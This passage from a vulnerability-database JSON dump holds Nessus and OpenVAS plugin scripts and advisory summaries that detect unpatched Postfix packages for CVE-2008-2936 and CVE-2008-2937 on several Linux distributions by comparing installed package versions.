CVE-2008-2936 /\nCVE-2008-2937 have been assigned to this problem.", "edition": 24, "published": "2008-08-14T00:00:00", "title": "SuSE 10 Security Update : Postfix (ZYPP Patch Number 5500)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "modified": "2008-08-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_POSTFIX-5500.NASL", "href": "https://www.tenable.com/plugins/nessus/33888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33888);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\");\n\n script_name(english:\"SuSE 10 Security Update : Postfix (ZYPP Patch Number 5500)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. 
CVE-2008-2936 /\nCVE-2008-2937 have been assigned to this problem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2936.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2937.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5500.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, 
\"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"postfix-2.2.9-10.25.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"postfix-2.2.9-10.26\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"postfix-2.2.9-10.25.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postfix-2.2.9-10.26\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:39", "description": "A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. CVE-2008-2936 and\nCVE-2008-2937 have been assigned to this problem.", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : postfix (postfix-133)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postfix-devel", "p-cpe:/a:novell:opensuse:postfix-mysql", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:postfix-postgresql", "p-cpe:/a:novell:opensuse:postfix"], "id": "SUSE_11_0_POSTFIX-080804.NASL", "href": "https://www.tenable.com/plugins/nessus/40111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postfix-133.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40111);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n 
script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\");\n\n script_name(english:\"openSUSE Security Update : postfix (postfix-133)\");\n script_summary(english:\"Check for the postfix-133 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. CVE-2008-2936 and\nCVE-2008-2937 have been assigned to this problem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=409120\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-2.5.1-28.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-devel-2.5.1-28.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-mysql-2.5.1-28.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-postgresql-2.5.1-28.3\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-25T10:56:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": 
"2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880268", "href": "http://plugins.openvas.org/nasl.php?oid=880268", "type": "openvas", "title": "CentOS Update for postfix CESA-2008:0839 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postfix CESA-2008:0839 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. 
(CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-August/015185.html\");\n script_id(880268);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0839\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"CentOS Update for postfix CESA-2008:0839 centos3 i386\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870021", "type": "openvas", "title": "RedHat Update for postfix RHSA-2008:0839-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for postfix RHSA-2008:0839-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. 
If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. (CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-August/msg00015.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870021\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0839-01\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"RedHat Update for postfix RHSA-2008:0839-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pflogsumm\", rpm:\"postfix-pflogsumm~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pflogsumm\", rpm:\"postfix-pflogsumm~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.0.16~14.1.RHEL3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": 
"AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "The remote host is missing an update to postfix\nannounced via advisory DSA 1629-1.", "modified": "2017-07-07T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:61434", "href": "http://plugins.openvas.org/nasl.php?oid=61434", "type": "openvas", "title": "Debian Security Advisory DSA 1629-1 (postfix)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1629_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1629-1 (postfix)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nThe default Debian installation of Postfix is not affected. 
Only a\nconfiguration meeting the following requirements is vulnerable:\n* The mail delivery style is mailbox, with the Postfix built-in\nlocal(8) or virtual(8) delivery agents.\n* The mail spool directory is user-writeable.\n* The user can create hardlinks pointing to root-owned symlinks\nlocated in other directories.\n\nFor a detailed treating of this issue, please refer to the upstream\nauthor's announcement:\nhttp://article.gmane.org/gmane.mail.postfix.announce/110\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2etch1.\n\nFor the testing distribution (lenny), this problem has been fixed in\nversion 2.5.2-2lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed\nin version 2.5.4-1.\n\nWe recommend that you upgrade your postfix package.\";\ntag_summary = \"The remote host is missing an update to postfix\nannounced via advisory DSA 1629-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201629-1\";\n\n\nif(description)\n{\n script_id(61434);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 17:00:42 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-2936\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1629-1 (postfix)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880023", "href": 
"http://plugins.openvas.org/nasl.php?oid=880023", "type": "openvas", "title": "CentOS Update for postfix CESA-2008:0839 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postfix CESA-2008:0839 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. 
(CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-August/015186.html\");\n script_id(880023);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0839\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"CentOS Update for postfix CESA-2008:0839 centos3 x86_64\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880268", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880268", "type": "openvas", "title": "CentOS Update for postfix CESA-2008:0839 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postfix CESA-2008:0839 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. 
